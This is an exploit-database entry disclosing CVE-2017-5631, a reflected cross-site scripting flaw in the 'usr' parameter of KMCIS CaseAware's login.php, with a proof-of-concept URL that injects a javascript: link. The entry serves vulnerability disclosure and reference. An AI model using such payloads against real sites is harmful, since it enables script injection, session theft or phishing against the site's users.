KMCIS CaseAware - Cross-Site Scripting Vulnerability

🗓️ 21 May 2017 00:00:00Reported by justpentestType

zdt🔗 0day.today👁 38 Views

KMCIS CaseAware - Cross-Site Scripting Vuln

Reporter	Title	Published	Views	Family All 9
CNVD	KMCIS CaseAware Cross-Site Scripting Vulnerability	3 May 201700:00	–	cnvd
CVE	CVE-2017-5631	1 May 201714:00	–	cve
Cvelist	CVE-2017-5631	1 May 201714:00	–	cvelist
Exploit DB	KMCIS CaseAware - Cross-Site Scripting	20 May 201700:00	–	exploitdb
exploitpack	KMCIS CaseAware - Cross-Site Scripting	20 May 201700:00	–	exploitpack
Nuclei	KMCIS CaseAware - Cross-Site Scripting	12 Jun 202603:02	–	nuclei
NVD	CVE-2017-5631	1 May 201714:59	–	nvd
Packet Storm	CaseAware Cross Site Scripting	20 May 201700:00	–	packetstorm
Prion	Cross site scripting	1 May 201714:59	–	prion

# Exploit Title: CaseAware Cross Site Scripting Vulnerability
# Date: 20th May 2017
# Exploit Author: justpentest
# Vendor Homepage: https://caseaware.com/
# Version: All the versions
# Contact: [email protected]
# CVE : 2017-5631
 
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
 
1) Description:
An issue with respect to input sanitization was discovered in KMCIS
CaseAware. Reflected cross site scripting is present in the user parameter
(i.e., "usr") that is transmitted in the login.php query string. So
bascially username parameter is vulnerable to XSS.
 
2) Exploit:
 
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
----------------------------------------------------------------------------------------
 
3) References:
 
https://www.openbugbounty.org/incidents/228262/
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle

#  0day.today [2018-03-03]  #

21 May 2017 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.2527